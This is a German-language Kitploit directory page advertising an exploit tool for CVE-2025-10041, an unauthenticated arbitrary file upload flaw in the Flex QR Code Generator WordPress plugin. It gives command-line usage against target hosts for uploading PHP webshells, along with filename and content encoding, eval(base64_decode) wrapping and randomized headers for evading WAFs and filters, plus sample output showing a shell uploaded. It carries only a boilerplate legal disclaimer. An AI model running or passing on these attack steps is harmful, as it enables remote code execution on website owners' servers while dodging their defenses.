Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-10041 — Flex QR Code Generator <= 1.2.5 - Nicht authentifizierter beliebiger Datei-Upload | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-10041
Payload-GenerierungSchwachstellenanalyseExploitationIDS/IPS-UmgehungWebanwendungs-ExploitationWAF-Umgehung
GitHubnxploited/cve-2025-10041

CVE-2025-10041

Flex QR Code Generator <= 1.2.5 - Nicht authentifizierter beliebiger Datei-Upload

Repository anzeigen
33vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-10041

Flex QR Code Generator <= 1.2.5 - Nicht authentifizierter beliebiger Datei-Upload

🚨 Flex QR Code Generator ≤ 1.2.5 - Nicht authentifizierter beliebiger Datei-Upload


📝 Beschreibung

Das Flex QR Code Generator-Plugin für WordPress ist anfällig für beliebige Datei-Uploads aufgrund fehlender Dateityp-Prüfung in der Funktion save_qr_code_to_db() in allen Versionen bis einschließlich 1.2.5.
Dies ermöglicht nicht authentifizierten Angreifern, schädliche Dateien auf den Server der betroffenen Website hochzuladen, was potenziell zu Remote-Code-Ausführung führen kann.

  • CVE: CVE-2025-10041
  • CVSS: 9.8 (Kritisch)

💡 Über dieses Skript

CVE-2025-10041.py ist ein professionelles Exploit-Tool, das entwickelt wurde, um den Angriff unter Ausnutzung dieser Schwachstelle zu automatisieren.
Es bietet erweiterte Funktionen zur Umgehung gängiger Schutzmechanismen und Kodierungstechniken.


⚙️ Funktionen

  • Automatische Erkennung der Schwachstelle (Versionsprüfung)
  • Beliebiger Datei-Upload (einschließlich PHP-Webshells)
  • Umgehung der Dateinamen-Kodierung: Base64- oder URL-Kodierung
  • Umgehung der Inhaltskodierung: PHP-Base64-Wrapper für Shell-Code
  • Zufällige HTTP-Header zur Umgehung einfacher WAFs
  • Unterstützung benutzerdefinierter Header
  • Vollständige Befehlszeilenschnittstelle mit Argument-Parsing und Hilfemeldung

🖥️ Verwendung

1. Einfacher Exploit

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com

2. Kodierung des Shell-Dateinamens

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url

3. Kodierung des Shell-Inhalts

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64

4. Benutzerdefinierter Shell-Dateiname

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php

5. Erweitert (Optionen kombinieren)

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php

6. Benutzerdefinierte Header

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"

🆘 Hilfe

Um alle verfügbaren Optionen und Verwendungshinweise anzuzeigen:

root@kitploit:~
python3 CVE-2025-10041.py --help

🔓 Umgehungstechniken

  • Dateinamen-Kodierung: Einige Server blockieren .php oder verdächtige Namen; Kodierung kann Filter umgehen.
  • Inhaltskodierung: Das Umwickeln von Shell-Code in eval(base64_decode(...)) kann Inhaltsfilter umgehen.
  • Zufällige Header: Rotierende User-Agents, Referer und Cookies zur Erkennungsvermeidung.
  • Benutzerdefinierte Header: Eigene Header für erweiterte Umgehung hinzufügen.

📋 Beispielausgabe

root@kitploit:~
Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}

⚠️ Haftungsausschluss

Dieses Skript wird nur für Bildungs-, Forschungs- und autorisierte Penetrationstest-Zwecke bereitgestellt.
Die unautorisierte Nutzung gegen Systeme, die du nicht besitzt oder für die du keine ausdrückliche Erlaubnis zum Testen hast, ist strengstens verboten und illegal.
Der Autor ist nicht verantwortlich für jeglichen Missbrauch oder Schaden, der durch dieses Tool verursacht wird.


✍️ Von:

Nxploited (Khaled Alenazi)


Tool herunterladen